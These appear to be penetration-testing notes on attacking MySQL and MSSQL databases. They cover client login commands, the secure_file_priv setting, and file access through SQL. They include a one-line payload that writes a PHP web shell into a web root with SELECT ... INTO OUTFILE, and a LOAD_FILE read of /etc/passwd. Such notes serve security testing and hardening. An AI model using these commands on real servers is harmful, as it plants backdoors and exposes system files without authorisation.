Linux

mysql -u $USER -p$PWD -h $IP

Windows

sqlcmd -S SRVMSSQL -U $USER -P $PWD -y 30 -Y 30

Write Local Files

MySQL does not have a stored procedure like xp_cmdshell , but we can achieve command execution if we write to a location in the file system that can execute our commands.

In MySQL, a global system variable secure_file_priv limits the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege.

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

secure_file_priv

• If empty, the variable has no effect, which is not a secure setting.
• If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
• If set to NULL, the server disables import and export operations.

In the example below, we can see the variable is empty, which means we can read and write data using MySQL

mysql> show variables like "secure_file_priv";

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+

Read Local Files

by default a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files using the following methods

mysql> select LOAD_FILE("/etc/passwd");